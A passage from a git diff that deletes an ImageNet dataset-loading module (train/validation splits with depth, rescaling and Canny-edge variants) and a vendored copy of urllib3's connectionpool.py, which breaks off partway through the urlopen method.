"https://heibox.uni-heidelberg.de/f/d835d5b6ceda4d3aa910/?dl=1" - self.idx2syn = os.path.join(self.root, "index_synset.yaml") - if (not os.path.exists(self.idx2syn)): - download(URL, self.idx2syn) - - def _load(self): - with open(self.txt_filelist, "r") as f: - self.relpaths = f.read().splitlines() - l1 = len(self.relpaths) - self.relpaths = self._filter_relpaths(self.relpaths) - print("Removed {} files from filelist during filtering.".format(l1 - len(self.relpaths))) - - self.synsets = [p.split("/")[0] for p in self.relpaths] - self.abspaths = [os.path.join(self.datadir, p) for p in self.relpaths] - - unique_synsets = np.unique(self.synsets) - class_dict = dict((synset, i) for i, synset in enumerate(unique_synsets)) - self.class_labels = [class_dict[s] for s in self.synsets] - - with open(self.human_dict, "r") as f: - human_dict = f.read().splitlines() - human_dict = dict(line.split(maxsplit=1) for line in human_dict) - - self.human_labels = [human_dict[s] for s in self.synsets] - - labels = { - "relpath": np.array(self.relpaths), - "synsets": np.array(self.synsets), - "class_label": np.array(self.class_labels), - "human_label": np.array(self.human_labels), - } - self.data = ImagePaths(self.abspaths, - labels=labels, - size=retrieve(self.config, "size", default=0), - random_crop=self.random_crop) - - -class ImageNetTrain(ImageNetBase): - NAME = "ILSVRC2012_train" - URL = "http://www.image-net.org/challenges/LSVRC/2012/" - AT_HASH = "a306397ccf9c2ead27155983c254227c0fd938e2" - FILES = [ - "ILSVRC2012_img_train.tar", - ] - SIZES = [ - 147897477120, - ] - - def _prepare(self): - self.random_crop = retrieve(self.config, "ImageNetTrain/random_crop", - default=True) - cachedir = os.environ.get("XDG_CACHE_HOME", os.path.expanduser("~/.cache")) - self.root = os.path.join(cachedir, "autoencoders/data", self.NAME) - self.datadir = os.path.join(self.root, "data") - self.txt_filelist = os.path.join(self.root, "filelist.txt") - self.expected_length = 1281167 - if not bdu.is_prepared(self.root): - # prep - print("Preparing dataset {} in {}".format(self.NAME, self.root)) - - datadir = self.datadir - if not os.path.exists(datadir): - path = os.path.join(self.root, self.FILES[0]) - if not os.path.exists(path) or not os.path.getsize(path)==self.SIZES[0]: - import academictorrents as at - atpath = at.get(self.AT_HASH, datastore=self.root) - assert atpath == path - - print("Extracting {} to {}".format(path, datadir)) - os.makedirs(datadir, exist_ok=True) - with tarfile.open(path, "r:") as tar: - tar.extractall(path=datadir) - - print("Extracting sub-tars.") - subpaths = sorted(glob.glob(os.path.join(datadir, "*.tar"))) - for subpath in tqdm(subpaths): - subdir = subpath[:-len(".tar")] - os.makedirs(subdir, exist_ok=True) - with tarfile.open(subpath, "r:") as tar: - tar.extractall(path=subdir) - - - filelist = glob.glob(os.path.join(datadir, "**", "*.JPEG")) - filelist = [os.path.relpath(p, start=datadir) for p in filelist] - filelist = sorted(filelist) - filelist = "\n".join(filelist)+"\n" - with open(self.txt_filelist, "w") as f: - f.write(filelist) - - bdu.mark_prepared(self.root) - - -class ImageNetValidation(ImageNetBase): - NAME = "ILSVRC2012_validation" - URL = "http://www.image-net.org/challenges/LSVRC/2012/" - AT_HASH = "5d6d0df7ed81efd49ca99ea4737e0ae5e3a5f2e5" - VS_URL = "https://heibox.uni-heidelberg.de/f/3e0f6e9c624e45f2bd73/?dl=1" - FILES = [ - "ILSVRC2012_img_val.tar", - "validation_synset.txt", - ] - SIZES = [ - 6744924160, - 1950000, - ] - - def _prepare(self): - self.random_crop = retrieve(self.config, "ImageNetValidation/random_crop", - default=False) - cachedir = os.environ.get("XDG_CACHE_HOME", os.path.expanduser("~/.cache")) - self.root = os.path.join(cachedir, "autoencoders/data", self.NAME) - self.datadir = os.path.join(self.root, "data") - self.txt_filelist = os.path.join(self.root, "filelist.txt") - self.expected_length = 50000 - if not bdu.is_prepared(self.root): - # prep - print("Preparing dataset {} in {}".format(self.NAME, self.root)) - - datadir = self.datadir - if not os.path.exists(datadir): - path = os.path.join(self.root, self.FILES[0]) - if not os.path.exists(path) or not os.path.getsize(path)==self.SIZES[0]: - import academictorrents as at - atpath = at.get(self.AT_HASH, datastore=self.root) - assert atpath == path - - print("Extracting {} to {}".format(path, datadir)) - os.makedirs(datadir, exist_ok=True) - with tarfile.open(path, "r:") as tar: - tar.extractall(path=datadir) - - vspath = os.path.join(self.root, self.FILES[1]) - if not os.path.exists(vspath) or not os.path.getsize(vspath)==self.SIZES[1]: - download(self.VS_URL, vspath) - - with open(vspath, "r") as f: - synset_dict = f.read().splitlines() - synset_dict = dict(line.split() for line in synset_dict) - - print("Reorganizing into synset folders") - synsets = np.unique(list(synset_dict.values())) - for s in synsets: - os.makedirs(os.path.join(datadir, s), exist_ok=True) - for k, v in synset_dict.items(): - src = os.path.join(datadir, k) - dst = os.path.join(datadir, v) - shutil.move(src, dst) - - filelist = glob.glob(os.path.join(datadir, "**", "*.JPEG")) - filelist = [os.path.relpath(p, start=datadir) for p in filelist] - filelist = sorted(filelist) - filelist = "\n".join(filelist)+"\n" - with open(self.txt_filelist, "w") as f: - f.write(filelist) - - bdu.mark_prepared(self.root) - - -def get_preprocessor(size=None, random_crop=False, additional_targets=None, - crop_size=None): - if size is not None and size > 0: - transforms = list() - rescaler = albumentations.SmallestMaxSize(max_size = size) - transforms.append(rescaler) - if not random_crop: - cropper = albumentations.CenterCrop(height=size,width=size) - transforms.append(cropper) - else: - cropper = albumentations.RandomCrop(height=size,width=size) - transforms.append(cropper) - flipper = albumentations.HorizontalFlip() - transforms.append(flipper) - preprocessor = albumentations.Compose(transforms, - additional_targets=additional_targets) - elif crop_size is not None and crop_size > 0: - if not random_crop: - cropper = albumentations.CenterCrop(height=crop_size,width=crop_size) - else: - cropper = albumentations.RandomCrop(height=crop_size,width=crop_size) - transforms = [cropper] - preprocessor = albumentations.Compose(transforms, - additional_targets=additional_targets) - else: - preprocessor = lambda **kwargs: kwargs - return preprocessor - - -def rgba_to_depth(x): - assert x.dtype == np.uint8 - assert len(x.shape) == 3 and x.shape[2] == 4 - y = x.copy() - y.dtype = np.float32 - y = y.reshape(x.shape[:2]) - return np.ascontiguousarray(y) - - -class BaseWithDepth(Dataset): - DEFAULT_DEPTH_ROOT="data/imagenet_depth" - - def __init__(self, config=None, size=None, random_crop=False, - crop_size=None, root=None): - self.config = config - self.base_dset = self.get_base_dset() - self.preprocessor = get_preprocessor( - size=size, - crop_size=crop_size, - random_crop=random_crop, - additional_targets={"depth": "image"}) - self.crop_size = crop_size - if self.crop_size is not None: - self.rescaler = albumentations.Compose( - [albumentations.SmallestMaxSize(max_size = self.crop_size)], - additional_targets={"depth": "image"}) - if root is not None: - self.DEFAULT_DEPTH_ROOT = root - - def __len__(self): - return len(self.base_dset) - - def preprocess_depth(self, path): - rgba = np.array(Image.open(path)) - depth = rgba_to_depth(rgba) - depth = (depth - depth.min())/max(1e-8, depth.max()-depth.min()) - depth = 2.0*depth-1.0 - return depth - - def __getitem__(self, i): - e = self.base_dset[i] - e["depth"] = self.preprocess_depth(self.get_depth_path(e)) - # up if necessary - h,w,c = e["image"].shape - if self.crop_size and min(h,w) < self.crop_size: - # have to upscale to be able to crop - this just uses bilinear - out = self.rescaler(image=e["image"], depth=e["depth"]) - e["image"] = out["image"] - e["depth"] = out["depth"] - transformed = self.preprocessor(image=e["image"], depth=e["depth"]) - e["image"] = transformed["image"] - e["depth"] = transformed["depth"] - return e - - -class ImageNetTrainWithDepth(BaseWithDepth): - # default to random_crop=True - def __init__(self, random_crop=True, sub_indices=None, **kwargs): - self.sub_indices = sub_indices - super().__init__(random_crop=random_crop, **kwargs) - - def get_base_dset(self): - if self.sub_indices is None: - return ImageNetTrain() - else: - return ImageNetTrain({"sub_indices": self.sub_indices}) - - def get_depth_path(self, e): - fid = os.path.splitext(e["relpath"])[0]+".png" - fid = os.path.join(self.DEFAULT_DEPTH_ROOT, "train", fid) - return fid - - -class ImageNetValidationWithDepth(BaseWithDepth): - def __init__(self, sub_indices=None, **kwargs): - self.sub_indices = sub_indices - super().__init__(**kwargs) - - def get_base_dset(self): - if self.sub_indices is None: - return ImageNetValidation() - else: - return ImageNetValidation({"sub_indices": self.sub_indices}) - - def get_depth_path(self, e): - fid = os.path.splitext(e["relpath"])[0]+".png" - fid = os.path.join(self.DEFAULT_DEPTH_ROOT, "val", fid) - return fid - - -class RINTrainWithDepth(ImageNetTrainWithDepth): - def __init__(self, config=None, size=None, random_crop=True, crop_size=None): - sub_indices = "30-32, 33-37, 151-268, 281-285, 80-100, 365-382, 389-397, 118-121, 300-319" - super().__init__(config=config, size=size, random_crop=random_crop, - sub_indices=sub_indices, crop_size=crop_size) - - -class RINValidationWithDepth(ImageNetValidationWithDepth): - def __init__(self, config=None, size=None, random_crop=False, crop_size=None): - sub_indices = "30-32, 33-37, 151-268, 281-285, 80-100, 365-382, 389-397, 118-121, 300-319" - super().__init__(config=config, size=size, random_crop=random_crop, - sub_indices=sub_indices, crop_size=crop_size) - - -class DRINExamples(Dataset): - def __init__(self): - self.preprocessor = get_preprocessor(size=256, additional_targets={"depth": "image"}) - with open("data/drin_examples.txt", "r") as f: - relpaths = f.read().splitlines() - self.image_paths = [os.path.join("data/drin_images", - relpath) for relpath in relpaths] - self.depth_paths = [os.path.join("data/drin_depth", - relpath.replace(".JPEG", ".png")) for relpath in relpaths] - - def __len__(self): - return len(self.image_paths) - - def preprocess_image(self, image_path): - image = Image.open(image_path) - if not image.mode == "RGB": - image = image.convert("RGB") - image = np.array(image).astype(np.uint8) - image = self.preprocessor(image=image)["image"] - image = (image/127.5 - 1.0).astype(np.float32) - return image - - def preprocess_depth(self, path): - rgba = np.array(Image.open(path)) - depth = rgba_to_depth(rgba) - depth = (depth - depth.min())/max(1e-8, depth.max()-depth.min()) - depth = 2.0*depth-1.0 - return depth - - def __getitem__(self, i): - e = dict() - e["image"] = self.preprocess_image(self.image_paths[i]) - e["depth"] = self.preprocess_depth(self.depth_paths[i]) - transformed = self.preprocessor(image=e["image"], depth=e["depth"]) - e["image"] = transformed["image"] - e["depth"] = transformed["depth"] - return e - - -def imscale(x, factor, keepshapes=False, keepmode="bicubic"): - if factor is None or factor==1: - return x - - dtype = x.dtype - assert dtype in [np.float32, np.float64] - assert x.min() >= -1 - assert x.max() <= 1 - - keepmode = {"nearest": Image.NEAREST, "bilinear": Image.BILINEAR, - "bicubic": Image.BICUBIC}[keepmode] - - lr = (x+1.0)*127.5 - lr = lr.clip(0,255).astype(np.uint8) - lr = Image.fromarray(lr) - - h, w, _ = x.shape - nh = h//factor - nw = w//factor - assert nh > 0 and nw > 0, (nh, nw) - - lr = lr.resize((nw,nh), Image.BICUBIC) - if keepshapes: - lr = lr.resize((w,h), keepmode) - lr = np.array(lr)/127.5-1.0 - lr = lr.astype(dtype) - - return lr - - -class ImageNetScale(Dataset): - def __init__(self, size=None, crop_size=None, random_crop=False, - up_factor=None, hr_factor=None, keep_mode="bicubic"): - self.base = self.get_base() - - self.size = size - self.crop_size = crop_size if crop_size is not None else self.size - self.random_crop = random_crop - self.up_factor = up_factor - self.hr_factor = hr_factor - self.keep_mode = keep_mode - - transforms = list() - - if self.size is not None and self.size > 0: - rescaler = albumentations.SmallestMaxSize(max_size = self.size) - self.rescaler = rescaler - transforms.append(rescaler) - - if self.crop_size is not None and self.crop_size > 0: - if len(transforms) == 0: - self.rescaler = albumentations.SmallestMaxSize(max_size = self.crop_size) - - if not self.random_crop: - cropper = albumentations.CenterCrop(height=self.crop_size,width=self.crop_size) - else: - cropper = albumentations.RandomCrop(height=self.crop_size,width=self.crop_size) - transforms.append(cropper) - - if len(transforms) > 0: - if self.up_factor is not None: - additional_targets = {"lr": "image"} - else: - additional_targets = None - self.preprocessor = albumentations.Compose(transforms, - additional_targets=additional_targets) - else: - self.preprocessor = lambda **kwargs: kwargs - - def __len__(self): - return len(self.base) - - def __getitem__(self, i): - example = self.base[i] - image = example["image"] - # adjust resolution - image = imscale(image, self.hr_factor, keepshapes=False) - h,w,c = image.shape - if self.crop_size and min(h,w) < self.crop_size: - # have to upscale to be able to crop - this just uses bilinear - image = self.rescaler(image=image)["image"] - if self.up_factor is None: - image = self.preprocessor(image=image)["image"] - example["image"] = image - else: - lr = imscale(image, self.up_factor, keepshapes=True, - keepmode=self.keep_mode) - - out = self.preprocessor(image=image, lr=lr) - example["image"] = out["image"] - example["lr"] = out["lr"] - - return example - -class ImageNetScaleTrain(ImageNetScale): - def __init__(self, random_crop=True, **kwargs): - super().__init__(random_crop=random_crop, **kwargs) - - def get_base(self): - return ImageNetTrain() - -class ImageNetScaleValidation(ImageNetScale): - def get_base(self): - return ImageNetValidation() - - -from skimage.feature import canny -from skimage.color import rgb2gray - - -class ImageNetEdges(ImageNetScale): - def __init__(self, up_factor=1, **kwargs): - super().__init__(up_factor=1, **kwargs) - - def __getitem__(self, i): - example = self.base[i] - image = example["image"] - h,w,c = image.shape - if self.crop_size and min(h,w) < self.crop_size: - # have to upscale to be able to crop - this just uses bilinear - image = self.rescaler(image=image)["image"] - - lr = canny(rgb2gray(image), sigma=2) - lr = lr.astype(np.float32) - lr = lr[:,:,None][:,:,[0,0,0]] - - out = self.preprocessor(image=image, lr=lr) - example["image"] = out["image"] - example["lr"] = out["lr"] - - return example - - -class ImageNetEdgesTrain(ImageNetEdges): - def __init__(self, random_crop=True, **kwargs): - super().__init__(random_crop=random_crop, **kwargs) - - def get_base(self): - return ImageNetTrain() - -class ImageNetEdgesValidation(ImageNetEdges): - def get_base(self): - return ImageNetValidation() diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/urllib3/connectionpool.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/urllib3/connectionpool.py deleted file mode 100644 index 96339e90af17e12a86750eba73746e25f9f76271..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/urllib3/connectionpool.py +++ /dev/null @@ -1,1110 +0,0 @@ -from __future__ import absolute_import - -import errno -import logging -import re -import socket -import sys -import warnings -from socket import error as SocketError -from socket import timeout as SocketTimeout - -from .connection import ( - BaseSSLError, - BrokenPipeError, - DummyConnection, - HTTPConnection, - HTTPException, - HTTPSConnection, - VerifiedHTTPSConnection, - port_by_scheme, -) -from .exceptions import ( - ClosedPoolError, - EmptyPoolError, - HeaderParsingError, - HostChangedError, - InsecureRequestWarning, - LocationValueError, - MaxRetryError, - NewConnectionError, - ProtocolError, - ProxyError, - ReadTimeoutError, - SSLError, - TimeoutError, -) -from .packages import six -from .packages.six.moves import queue -from .request import RequestMethods -from .response import HTTPResponse -from .util.connection import is_connection_dropped -from .util.proxy import connection_requires_http_tunnel -from .util.queue import LifoQueue -from .util.request import set_file_position -from .util.response import assert_header_parsing -from .util.retry import Retry -from .util.ssl_match_hostname import CertificateError -from .util.timeout import Timeout -from .util.url import Url, _encode_target -from .util.url import _normalize_host as normalize_host -from .util.url import get_host, parse_url - -xrange = six.moves.xrange - -log = logging.getLogger(__name__) - -_Default = object() - - -# Pool objects -class ConnectionPool(object): - """ - Base class for all connection pools, such as - :class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`. - - .. note:: - ConnectionPool.urlopen() does not normalize or percent-encode target URIs - which is useful if your target server doesn't support percent-encoded - target URIs. - """ - - scheme = None - QueueCls = LifoQueue - - def __init__(self, host, port=None): - if not host: - raise LocationValueError("No host specified.") - - self.host = _normalize_host(host, scheme=self.scheme) - self._proxy_host = host.lower() - self.port = port - - def __str__(self): - return "%s(host=%r, port=%r)" % (type(self).__name__, self.host, self.port) - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - self.close() - # Return False to re-raise any potential exceptions - return False - - def close(self): - """ - Close all pooled connections and disable the pool. - """ - pass - - -# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252 -_blocking_errnos = {errno.EAGAIN, errno.EWOULDBLOCK} - - -class HTTPConnectionPool(ConnectionPool, RequestMethods): - """ - Thread-safe connection pool for one host. - - :param host: - Host used for this HTTP Connection (e.g. "localhost"), passed into - :class:`http.client.HTTPConnection`. - - :param port: - Port used for this HTTP Connection (None is equivalent to 80), passed - into :class:`http.client.HTTPConnection`. - - :param strict: - Causes BadStatusLine to be raised if the status line can't be parsed - as a valid HTTP/1.0 or 1.1 status line, passed into - :class:`http.client.HTTPConnection`. - - .. note:: - Only works in Python 2. This parameter is ignored in Python 3. - - :param timeout: - Socket timeout in seconds for each individual connection. This can - be a float or integer, which sets the timeout for the HTTP request, - or an instance of :class:`urllib3.util.Timeout` which gives you more - fine-grained control over request timeouts. After the constructor has - been parsed, this is always a `urllib3.util.Timeout` object. - - :param maxsize: - Number of connections to save that can be reused. More than 1 is useful - in multithreaded situations. If ``block`` is set to False, more - connections will be created but they will not be saved once they've - been used. - - :param block: - If set to True, no more than ``maxsize`` connections will be used at - a time. When no free connections are available, the call will block - until a connection has been released. This is a useful side effect for - particular multithreaded situations where one does not want to use more - than maxsize connections per host to prevent flooding. - - :param headers: - Headers to include with all requests, unless other headers are given - explicitly. - - :param retries: - Retry configuration to use by default with requests in this pool. - - :param _proxy: - Parsed proxy URL, should not be used directly, instead, see - :class:`urllib3.ProxyManager` - - :param _proxy_headers: - A dictionary with proxy headers, should not be used directly, - instead, see :class:`urllib3.ProxyManager` - - :param \\**conn_kw: - Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`, - :class:`urllib3.connection.HTTPSConnection` instances. - """ - - scheme = "http" - ConnectionCls = HTTPConnection - ResponseCls = HTTPResponse - - def __init__( - self, - host, - port=None, - strict=False, - timeout=Timeout.DEFAULT_TIMEOUT, - maxsize=1, - block=False, - headers=None, - retries=None, - _proxy=None, - _proxy_headers=None, - _proxy_config=None, - **conn_kw - ): - ConnectionPool.__init__(self, host, port) - RequestMethods.__init__(self, headers) - - self.strict = strict - - if not isinstance(timeout, Timeout): - timeout = Timeout.from_float(timeout) - - if retries is None: - retries = Retry.DEFAULT - - self.timeout = timeout - self.retries = retries - - self.pool = self.QueueCls(maxsize) - self.block = block - - self.proxy = _proxy - self.proxy_headers = _proxy_headers or {} - self.proxy_config = _proxy_config - - # Fill the queue up so that doing get() on it will block properly - for _ in xrange(maxsize): - self.pool.put(None) - - # These are mostly for testing and debugging purposes. - self.num_connections = 0 - self.num_requests = 0 - self.conn_kw = conn_kw - - if self.proxy: - # Enable Nagle's algorithm for proxies, to avoid packet fragmentation. - # We cannot know if the user has added default socket options, so we cannot replace the - # list. - self.conn_kw.setdefault("socket_options", []) - - self.conn_kw["proxy"] = self.proxy - self.conn_kw["proxy_config"] = self.proxy_config - - def _new_conn(self): - """ - Return a fresh :class:`HTTPConnection`. - """ - self.num_connections += 1 - log.debug( - "Starting new HTTP connection (%d): %s:%s", - self.num_connections, - self.host, - self.port or "80", - ) - - conn = self.ConnectionCls( - host=self.host, - port=self.port, - timeout=self.timeout.connect_timeout, - strict=self.strict, - **self.conn_kw - ) - return conn - - def _get_conn(self, timeout=None): - """ - Get a connection. Will return a pooled connection if one is available. - - If no connections are available and :prop:`.block` is ``False``, then a - fresh connection is returned. - - :param timeout: - Seconds to wait before giving up and raising - :class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and - :prop:`.block` is ``True``. - """ - conn = None - try: - conn = self.pool.get(block=self.block, timeout=timeout) - - except AttributeError: # self.pool is None - raise ClosedPoolError(self, "Pool is closed.") - - except queue.Empty: - if self.block: - raise EmptyPoolError( - self, - "Pool reached maximum size and no more connections are allowed.", - ) - pass # Oh well, we'll create a new connection then - - # If this is a persistent connection, check if it got disconnected - if conn and is_connection_dropped(conn): - log.debug("Resetting dropped connection: %s", self.host) - conn.close() - if getattr(conn, "auto_open", 1) == 0: - # This is a proxied connection that has been mutated by - # http.client._tunnel() and cannot be reused (since it would - # attempt to bypass the proxy) - conn = None - - return conn or self._new_conn() - - def _put_conn(self, conn): - """ - Put a connection back into the pool. - - :param conn: - Connection object for the current host and port as returned by - :meth:`._new_conn` or :meth:`._get_conn`. - - If the pool is already full, the connection is closed and discarded - because we exceeded maxsize. If connections are discarded frequently, - then maxsize should be increased. - - If the pool is closed, then the connection will be closed and discarded. - """ - try: - self.pool.put(conn, block=False) - return # Everything is dandy, done. - except AttributeError: - # self.pool is None. - pass - except queue.Full: - # This should never happen if self.block == True - log.warning( - "Connection pool is full, discarding connection: %s. Connection pool size: %s", - self.host, - self.pool.qsize(), - ) - # Connection never got put back into the pool, close it. - if conn: - conn.close() - - def _validate_conn(self, conn): - """ - Called right before a request is made, after the socket is created. - """ - pass - - def _prepare_proxy(self, conn): - # Nothing to do for HTTP connections. - pass - - def _get_timeout(self, timeout): - """Helper that always returns a :class:`urllib3.util.Timeout`""" - if timeout is _Default: - return self.timeout.clone() - - if isinstance(timeout, Timeout): - return timeout.clone() - else: - # User passed us an int/float. This is for backwards compatibility, - # can be removed later - return Timeout.from_float(timeout) - - def _raise_timeout(self, err, url, timeout_value): - """Is the error actually a timeout? Will raise a ReadTimeout or pass""" - - if isinstance(err, SocketTimeout): - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % timeout_value - ) - - # See the above comment about EAGAIN in Python 3. In Python 2 we have - # to specifically catch it and throw the timeout error - if hasattr(err, "errno") and err.errno in _blocking_errnos: - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % timeout_value - ) - - # Catch possible read timeouts thrown as SSL errors. If not the - # case, rethrow the original. We need to do this because of: - # http://bugs.python.org/issue10272 - if "timed out" in str(err) or "did not complete (read)" in str( - err - ): # Python < 2.7.4 - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % timeout_value - ) - - def _make_request( - self, conn, method, url, timeout=_Default, chunked=False, **httplib_request_kw - ): - """ - Perform a request on a given urllib connection object taken from our - pool. - - :param conn: - a connection from one of our connection pools - - :param timeout: - Socket timeout in seconds for the request. This can be a - float or integer, which will set the same timeout value for - the socket connect and the socket read, or an instance of - :class:`urllib3.util.Timeout`, which gives you more fine-grained - control over your timeouts. - """ - self.num_requests += 1 - - timeout_obj = self._get_timeout(timeout) - timeout_obj.start_connect() - conn.timeout = timeout_obj.connect_timeout - - # Trigger any extra validation we need to do. - try: - self._validate_conn(conn) - except (SocketTimeout, BaseSSLError) as e: - # Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout. - self._raise_timeout(err=e, url=url, timeout_value=conn.timeout) - raise - - # conn.request() calls http.client.*.request, not the method in - # urllib3.request. It also calls makefile (recv) on the socket. - try: - if chunked: - conn.request_chunked(method, url, **httplib_request_kw) - else: - conn.request(method, url, **httplib_request_kw) - - # We are swallowing BrokenPipeError (errno.EPIPE) since the server is - # legitimately able to close the connection after sending a valid response. - # With this behaviour, the received response is still readable. - except BrokenPipeError: - # Python 3 - pass - except IOError as e: - # Python 2 and macOS/Linux - # EPIPE and ESHUTDOWN are BrokenPipeError on Python 2, and EPROTOTYPE is needed on macOS - # https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/ - if e.errno not in { - errno.EPIPE, - errno.ESHUTDOWN, - errno.EPROTOTYPE, - }: - raise - - # Reset the timeout for the recv() on the socket - read_timeout = timeout_obj.read_timeout - - # App Engine doesn't have a sock attr - if getattr(conn, "sock", None): - # In Python 3 socket.py will catch EAGAIN and return None when you - # try and read into the file pointer created by http.client, which - # instead raises a BadStatusLine exception. Instead of catching - # the exception and assuming all BadStatusLine exceptions are read - # timeouts, check for a zero timeout before making the request. - if read_timeout == 0: - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % read_timeout - ) - if read_timeout is Timeout.DEFAULT_TIMEOUT: - conn.sock.settimeout(socket.getdefaulttimeout()) - else: # None or a value - conn.sock.settimeout(read_timeout) - - # Receive the response from the server - try: - try: - # Python 2.7, use buffering of HTTP responses - httplib_response = conn.getresponse(buffering=True) - except TypeError: - # Python 3 - try: - httplib_response = conn.getresponse() - except BaseException as e: - # Remove the TypeError from the exception chain in - # Python 3 (including for exceptions like SystemExit). - # Otherwise it looks like a bug in the code. - six.raise_from(e, None) - except (SocketTimeout, BaseSSLError, SocketError) as e: - self._raise_timeout(err=e, url=url, timeout_value=read_timeout) - raise - - # AppEngine doesn't have a version attr. - http_version = getattr(conn, "_http_vsn_str", "HTTP/?") - log.debug( - '%s://%s:%s "%s %s %s" %s %s', - self.scheme, - self.host, - self.port, - method, - url, - http_version, - httplib_response.status, - httplib_response.length, - ) - - try: - assert_header_parsing(httplib_response.msg) - except (HeaderParsingError, TypeError) as hpe: # Platform-specific: Python 3 - log.warning( - "Failed to parse headers (url=%s): %s", - self._absolute_url(url), - hpe, - exc_info=True, - ) - - return httplib_response - - def _absolute_url(self, path): - return Url(scheme=self.scheme, host=self.host, port=self.port, path=path).url - - def close(self): - """ - Close all pooled connections and disable the pool. - """ - if self.pool is None: - return - # Disable access to the pool - old_pool, self.pool = self.pool, None - - try: - while True: - conn = old_pool.get(block=False) - if conn: - conn.close() - - except queue.Empty: - pass # Done. - - def is_same_host(self, url): - """ - Check if the given ``url`` is a member of the same host as this - connection pool. - """ - if url.startswith("/"): - return True - - # TODO: Add optional support for socket.gethostbyname checking. - scheme, host, port = get_host(url) - if host is not None: - host = _normalize_host(host, scheme=scheme) - - # Use explicit default port for comparison when none is given - if self.port and not port: - port = port_by_scheme.get(scheme) - elif not self.port and port == port_by_scheme.get(scheme): - port = None - - return (scheme, host, port) == (self.scheme, self.host, self.port) - - def urlopen( - self, - method, - url, - body=None, - headers=None, - retries=None, - redirect=True, - assert_same_host=True, - timeout=_Default, - pool_timeout=None, - release_conn=None, - chunked=False, - body_pos=None, - **response_kw - ): - """ - Get a connection from the pool and perform an HTTP request. This is the - lowest level call for making a request, so you'll need to specify all - the raw details. - - .. note:: - - More commonly, it's appropriate to use a convenience method provided - by :class:`.RequestMethods`, such as :meth:`request`. - - .. note:: - - `release_conn` will only behave as expected if - `preload_content=False` because we want to make - `preload_content=False` the default behaviour someday soon without - breaking backwards compatibility. - - :param method: - HTTP request method (such as GET, POST, PUT, etc.) - - :param url: - The URL to perform the request on. - - :param body: - Data to send in the request body, either :class:`str`, :class:`bytes`, - an iterable of :class:`str`/:class:`bytes`, or a file-like object. - - :param headers: - Dictionary of custom headers to send, such as User-Agent, - If-None-Match, etc. If None, pool headers are used. If provided, - these headers completely replace any pool-specific headers. - - :param retries: - Configure the number of retries to allow before raising a - :class:`~urllib3.exceptions.MaxRetryError` exception. - - Pass ``None`` to retry until you receive a response. Pass a - :class:`~urllib3.util.retry.Retry` object for fine-grained control - over different types of retries. - Pass an integer number to retry connection errors that many times, - but no other types of errors. Pass zero to never retry. - - If ``False``, then retries are disabled and any exception is raised - immediately. Also, instead of raising a MaxRetryError on redirects, - the redirect response will be returned. - - :type retries: :class:`~urllib3.util.retry.Retry`, False, or an int. - - :param redirect: - If True, automatically handle redirects (status codes 301, 302, - 303, 307, 308). Each redirect counts as a retry. Disabling retries - will disable redirect, too. - - :param assert_same_host: - If ``True``, will make sure that the host of the pool requests is - consistent else will raise HostChangedError. When ``False``, you can - use the pool on an HTTP proxy and request foreign hosts. - - :param timeout: - If specified, overrides the default timeout for this one - request. It may be a float (in seconds) or an instance of - :class:`urllib3.util.Timeout`. - - :param pool_timeout: - If set and the pool is set to block=True, then this method will - block for ``pool_timeout`` seconds and raise EmptyPoolError if no - connection is available within the time period. - - :param release_conn: - If False, then the urlopen call will not release the connection - back into the pool once a response is received (but will release if - you read the entire contents of the response such as when - `preload_content=True`). This is useful if you're not preloading - the response's content immediately. You will need to call - ``r.release_conn()`` on the response ``r`` to return the connection - back into the pool. If None, it takes the value of - ``response_kw.get('preload_content', True)``. - - :param chunked: - If True, urllib3 will send the body using chunked transfer - encoding. Otherwise, urllib3 will send the body using the standard - content-length form. Defaults to False. - - :param int body_pos: - Position to seek to in file-like body in the event of a retry or - redirect. Typically this won't need to be set because urllib3 will - auto-populate the value when needed. - - :param \\**response_kw: - Additional parameters are passed to - :meth:`urllib3.response.HTTPResponse.from_httplib` - """ - - parsed_url = parse_url(url) - destination_scheme = parsed_url.scheme - - if headers is None: - headers = self.headers - - if not isinstance(retries, Retry): - retries = Retry.from_int(retries, redirect=redirect, default=self.retries) - - if release_conn is None: - release_conn = response_kw.get("preload_content", True) - - # Check host - if assert_same_host and not self.is_same_host(url): - raise HostChangedError(self, url, retries) - - # Ensure that the URL we're connecting to is properly encoded - if url.startswith("/"): - url = six.ensure_str(_encode_target(url)) - else: - url = six.ensure_str(parsed_url.url) - - conn = None - - # Track whether `conn` needs to be released before - # returning/raising/recursing. Update this variable if necessary, and - # leave `release_conn` constant throughout the function. That way, if - # the function recurses, the original value of `release_conn` will be - # passed down into the recursive call, and its value will be respected. - # - # See issue #651 [1] for details. - # - # [1] - release_this_conn = release_conn - - http_tunnel_required = connection_requires_http_tunnel( - self.proxy, self.proxy_config, destination_scheme - ) - - # Merge the proxy headers. Only done when not using HTTP CONNECT. We - # have to copy the headers dict so we can safely change it without those - # changes being reflected in anyone else's copy. - if not http_tunnel_required: - headers = headers.copy() - headers.update(self.proxy_headers) - - # Must keep the exception bound to a separate variable or else Python 3 - # complains about UnboundLocalError. - err = None - - # Keep track of whether we cleanly exited the except block. This - # ensures we do proper cleanup in finally. - clean_exit = False - - # Rewind body position, if needed. Record current position - # for future rewinds in the event of a redirect/retry. - body_pos = set_file_position(body, body_pos) - - try: - # Request a connection from the queue. - timeout_obj = self._get_timeout(timeout) - conn = self._get_conn(timeout=pool_timeout) - - conn.timeout = timeout_obj.connect_timeout - - is_new_proxy_conn = self.proxy is not None and not getattr( - conn, "sock", None - ) - if is_new_proxy_conn and http_tunnel_required: - self._prepare_proxy(conn) - - # Make the request on the httplib connection object. - httplib_response = self._make_request( - conn, - method, - url, - timeout=timeout_obj, - body=body, - 